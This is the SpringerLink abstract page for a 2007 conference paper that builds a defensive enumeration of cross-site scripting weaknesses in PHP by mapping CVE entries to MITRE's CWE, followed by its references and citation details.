Skip to main content
SpringerLink
Log in

Constructing a “Common Cross Site Scripting Vulnerabilities Enumeration (CXE)” Using CWE and CVE

  • Conference paper
Information Systems Security (ICISS 2007)

Part of the book series: Lecture Notes in Computer Science ((LNSC,volume 4812))

Included in the following conference series:

Abstract

It has been found that almost 70% of the recent attacks in Web Applications have been carried out even when the systems have been protected with well laid Firewalls and Intrusion Detection Systems. Advisories sites report that more than 20% of the attacks have originated from Cross Site Scripting (XSS) vulnerabilities. Our analysis has shown that more than 40% of the vulnerabilities that are confirmed in Common Vulnerability Exposures (CVE), were based on PHP Script in the year 2006. Out of these PHP based vulnerabilities, 45% are classified under XSS. By organizing these errors into a simple taxonomy and mapping CVE with the Common Weakness Enumeration (CWE) of Mitre Corp, we have constructed a Common XSS vulnerability Enumeration (CXE). With the help of CXE, security practitioners can recognize the common types of developer patterns leading to coding errors in PHP, that result in XSS vulnerability, while developers can identify and rectify existing errors as they build software.

This is a preview of subscription content, log in via an institution to check access.

Access this chapter

Log in via an institution
Chapter
USD 29.95
Price excludes VAT (USA)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
eBook
USD 39.99
Price excludes VAT (USA)
  • Available as PDF
  • Read on any device
  • Instant download
  • Own it forever
Softcover Book
USD 54.99
Price excludes VAT (USA)
  • Compact, lightweight edition
  • Dispatched in 3 to 5 business days
  • Free shipping worldwide - see info

Tax calculation will be finalised at checkout

Purchases are for personal use only

Institutional subscriptions

Preview

Unable to display preview. Download preview PDF.

Unable to display preview. Download preview PDF.

References

  1. Lucca, G.A., Fasolino, A.R., et al.: Identifying Cross Site Scripting Vulnerabilities in Web Applications. In: Proceedings of the Sixth IEEE International Workshop on Web Site Evolution, pp. 71–80

    Google Scholar 

  2. Huang, Y., Tsai, C., Lin, T., Huang, S., Kuo’, D.T.: A testing framework for Web application, security assessment. Computer Networks 48, 739–761 (2005)

    Article  Google Scholar 

  3. McGraw, G., Chess, B., Tsipenyuk, K.: Seven Pernicious Kingdoms: A Taxonomy of Software Security Errors. In: NIST Workshop on Software Security Assurance Tools, Techniques and Metrics, Long Beach, CA, (November 2005)

    Google Scholar 

  4. Martin, R.A., Christey, S., Jarzombek, J.: The Case for Common Flaw Enumeration. In: NIST Workshop on Software Security Assurance Tools, Techniques, and Metrics, Long Beach, CA (November 2005)

    Google Scholar 

  5. Weber, S., Karger, P.A., Paradkar, A.: A Software Flaw Taxonomy: Aiming Tools at Security. In: SESS 2005. ACM Software Engineering for Secure Systems - Building Trustworthy Applications, St. Louis, Missouri, USA (June 2004)

    Google Scholar 

  6. Dehlinger, J., Feng, Q., Hu, L.: SSVChecker: Unifying Static Security Vulnerability Detection Tools in an Eclipse Plug-In. In: ETX 2006. Eclipse Technology Exchange Workshop at OOPSLA 2006, Portland (October 22-23, 2006)

    Google Scholar 

  7. The Software Assurance Metrics and Tool Evaluation (SAMATE) project, National Institute of Science and Technology (NIST), http://samate.nist.gov

  8. The OMG Software Assurance (SwA) Special Interest Group, http://swa.omg.org

  9. The Common Weaknesses Enumeration (CWE) Initiative, MITRE Corporation, http://cve.mitre.org/cwe

  10. The Preliminary List Of Vulnerability Examples for Researchers (PLOVER), MITRE Corporation, http://cve.mitre.org/docs/plover

  11. The Common Vulnerabilities and Exposures (CVE) Initiative, MITRE Corporation, http://cve.mitre.org

  12. OWASP Top Ten Most Critical Web Application Security Vulnerabilities, http://www.owasp.org/documentation/topten.html

  13. Department of Homeland Security National Cyber Security Division’s Build Security In (BSI) web site, http://buildsecurityin.us-cert.gov

  14. Klein, A.: Cross Site Scripting Explained, Sanctum Security Group, http://www.crypto.stanford.edu/cs155/CSS.pdf

  15. Endler, D.: The Evolution of Cross-Site Scripting Attacks iDEFENSE Labs, http://www.cgisecurity.com/lib/XSS.pdf

  16. Spett, K.: Are your web applications vulnerable, http://www.spidynamics.com/whitepapers/SPIcross-sitescripting.pdf

  17. Viega, J.: The CLASP Application Security Process, Secure Software, Inc., http://www.securesoftware.com

  18. Mauw, S.: PHP vulnerabilities 2IF30. In: ECSS group, Eindhoven University of Technology, The Netherlands, http://www.win.tue.nl/_ecss

  19. Christey, S.M.: Vulnerability Type Distributions in CVE Document version: 1.0 (October 4, 2006), http://cve.mitre.org/docs/docs-06/vuln-trends.html

  20. Barnum, M.: Being Explicit About Security Weaknesses Robert

    Google Scholar 

  21. Managing Application Security in Business Processes, http://www.verisign.com/managed-security-services/information-security/vulnerabilty-assessment/index.html

  22. Secunia vulnerability advisories Bugtraq, http://www.secunia.com

  23. Vulnerability advisories, http://www.securityfocus.com

  24. Certcoordination centre, http://www.cert.org

  25. National Vulnerability Database, http://nvd.nist.gov

  26. Common Vulnerability Scoring System, http://www.first.org/cvss

  27. Open Source Vulnerability Database, http://osvdb.org

Download references

Author information

Authors and Affiliations

  1. Dept. of Electronics & Computer Engg., Indian Institute of Technology, Roorkee,  

    K. Sivakumar & K. Garg

Authors
  1. K. Sivakumar
    View author publications

    You can also search for this author in PubMed Google Scholar

  2. K. Garg
    View author publications

    You can also search for this author in PubMed Google Scholar

Editor information

Patrick McDaniel Shyam K. Gupta

Rights and permissions

Reprints and permissions

Copyright information

© 2007 Springer-Verlag Berlin Heidelberg

About this paper

Cite this paper

Sivakumar, K., Garg, K. (2007). Constructing a “Common Cross Site Scripting Vulnerabilities Enumeration (CXE)” Using CWE and CVE. In: McDaniel, P., Gupta, S.K. (eds) Information Systems Security. ICISS 2007. Lecture Notes in Computer Science, vol 4812. Springer, Berlin, Heidelberg. https://doi.org/10.1007/978-3-540-77086-2_25

Download citation

  • DOI: https://doi.org/10.1007/978-3-540-77086-2_25

  • Publisher Name: Springer, Berlin, Heidelberg

  • Print ISBN: 978-3-540-77085-5

  • Online ISBN: 978-3-540-77086-2

  • eBook Packages: Computer ScienceComputer Science (R0)

Publish with us

Policies and ethics

Search

Navigation